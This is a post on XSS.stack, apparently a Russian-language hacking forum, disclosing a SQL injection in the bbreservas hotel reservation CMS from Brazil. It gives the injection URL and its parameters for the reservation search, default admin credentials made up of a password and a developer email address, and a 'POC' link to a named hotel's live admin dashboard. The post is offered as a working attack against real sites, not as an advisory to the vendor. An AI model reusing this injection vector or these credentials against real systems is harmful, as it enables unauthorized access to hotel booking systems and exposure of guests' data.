• XSS.stack #1 – первый литературный журнал от юзеров форума

SQL INJ bbreservas BRAZIL CMS

Отслеживать
oxahax

oxahax

floppy-диск
Пользователь
Регистрация
30.09.2019
Сообщения
7
Реакции
25
A simple sql injection in a Brazilian hotel cms


image.png.d1b3997f8f78dc280268a19b4a861b76.png


Injection vector




Код: 
https://www.site.com/reservas/search?date_start=609860^&date_end=600767^&qtde_adult=199816085


or 2951%3d02951^&qtde_child=0





standard credentials

Код: 
121314

desenvolvimento@venturaminas.com.br


    Vendor https://www.bbreservas.com.br/





POC https://www.dayrell.com.br/admin/dashboard


image.png.d8cb6807151ddad21b29884543751779.png
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх